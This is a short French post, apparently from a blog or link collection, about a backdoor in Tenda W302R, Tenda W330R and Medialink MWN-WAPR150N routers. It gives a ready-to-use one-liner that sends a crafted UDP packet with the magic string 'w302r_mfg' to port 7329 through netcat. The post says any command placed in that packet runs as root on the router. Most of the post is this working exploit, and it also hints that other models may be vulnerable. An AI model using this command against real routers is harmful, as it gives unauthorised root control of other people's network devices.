Peut-être encore plus facile que cette porte dérobée : http://www.tiger-222.fr/links/?GrEUOQ
Tout se passe au niveau de la forge du packet :
echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 IP_routeur 7329
Notez le "/bin/ls" dans le "echo", c'est la commande qui sera exécutée en root...

Ça concerne les routeurs Tenda W302R, Tenda W330R ou encore Medialink MWN-WAPR150N. Ils utilisent tous le mot magique "w302r_mfg". Doit bien y en avoir d'autres va...